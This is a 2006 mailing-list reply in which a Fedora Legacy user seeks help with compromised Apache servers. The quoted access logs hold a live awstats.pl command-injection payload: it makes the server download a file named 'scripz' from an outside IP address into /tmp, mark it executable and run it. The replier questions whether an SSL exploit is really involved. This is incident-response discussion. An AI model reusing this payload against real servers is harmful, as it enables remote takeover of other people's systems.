On Monday 23 January 2006 14:32, Michael Mansour wrote: > 403 344 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT > 5.1;)" 220.135.223.35 - - [23/Jan/2006:08:33:03 +1100] "GET > /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ft > mp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scrip >z%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1" > 404 340 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT > 5.1;)" > > These "scripz" files end up going into /tmp, being compiled with > gcc, renamed to "httpd" and run as that. > > I'm using: > > perl-5.8.3-17.4.legacy > httpd-2.0.51-1.9.legacy > openssl-0.9.7a-33.13.legacy > > Are there any updates FL can do to any of the packages to > fix/block slapper from an FC1 machine? > > Michael. > Are you sure it's using an SSL exploit? http://www.lurhq.com/slapperv2.html Regards, Mike Klinke -- fedora-legacy-list@xxxxxxxxxx https://www.redhat.com/mailman/listinfo/fedora-legacy-list
